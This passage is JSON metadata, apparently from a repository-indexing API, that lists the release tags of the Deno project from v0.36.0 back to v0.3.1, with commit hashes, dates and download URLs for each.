":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692